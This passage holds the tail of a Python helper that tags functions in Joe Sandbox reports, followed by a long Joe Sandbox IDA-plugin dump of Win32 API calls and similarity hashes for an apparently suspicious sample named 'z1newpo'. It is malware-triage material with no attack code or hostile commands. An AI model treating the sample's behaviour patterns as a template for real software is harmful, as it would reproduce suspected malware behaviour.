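    """Map each function's Instruction ID (first 12 hex chars) to its sorted tags."""
    return {f["id"][:12]: sorted(classify(f)) for f in parse_listing(text) if f["id"]}


SAMPLE = """\
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
Memory Dump Source
• Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?), ref: 0046B49D
Memory Dump Source
• Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
"""

if __name__ == "__main__":
    for fid, tags in triage(SAMPLE).items():
        print(fid, tags)
```

Feed the whole report text to triage() to tag every function at once; the subcall lines are parsed but excluded from the rules so that a helper's _malloc or IsWindow does not pollute the caller's tags.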
                                                    APIs
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                    • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                    • String ID:
                                                    • API String ID: 2354583917-0
                                                    • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                    • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                    • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                    • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                    • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                    • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                    • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                    • String ID:
                                                    • API String ID: 896007046-0
                                                    • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                    • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                    • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                    • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                    APIs
                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                    • GetFocus.USER32 ref: 00448ACF
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                    • String ID:
                                                    • API String ID: 3429747543-0
                                                    • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                    • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                    • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                    • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                    APIs
                                                      • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                      • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                      • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                    • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 3300667738-0
                                                    • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                    • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                    • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                    • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                    • __swprintf.LIBCMT ref: 0045D4E9
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu$\VH
                                                    • API String ID: 3164766367-2432546070
                                                    • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                    • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                    • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                    • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 3850602802-3636473452
                                                    • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                    • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                    • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                    • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                    • String ID:
                                                    • API String ID: 3985565216-0
                                                    • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                    • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                    • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                    • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                    APIs
                                                    • _malloc.LIBCMT ref: 0041F707
                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                    • _free.LIBCMT ref: 0041F71A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free_malloc
                                                    • String ID: [B
                                                    • API String ID: 1020059152-632041663
                                                    • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                    • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                    • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                    • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                    • __calloc_crt.LIBCMT ref: 00413DB0
                                                    • __getptd.LIBCMT ref: 00413DBD
                                                    • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                    • _free.LIBCMT ref: 00413E07
                                                    • __dosmaperr.LIBCMT ref: 00413E12
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                    • String ID:
                                                    • API String ID: 155776804-0
                                                    • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                    • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                    • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                    • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                    APIs
                                                      • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                      • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                    • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                    • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                    • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                    • ExitThread.KERNEL32 ref: 00413D4E
                                                    • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                    • __freefls@4.LIBCMT ref: 00413D74
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                    • String ID:
                                                    • API String ID: 259663610-0
                                                    • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                    • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                    • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                    • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004302E6
                                                    • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                    • GetClientRect.USER32(?,?), ref: 00430364
                                                    • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                    • GetWindowRect.USER32(?,?), ref: 004303C3
                                                    • ScreenToClient.USER32(?,?), ref: 004303EC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                    • String ID:
                                                    • API String ID: 3220332590-0
                                                    • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                    • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                    • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                    • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                    • String ID:
                                                    • API String ID: 1612042205-0
                                                    • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                    • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                    • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
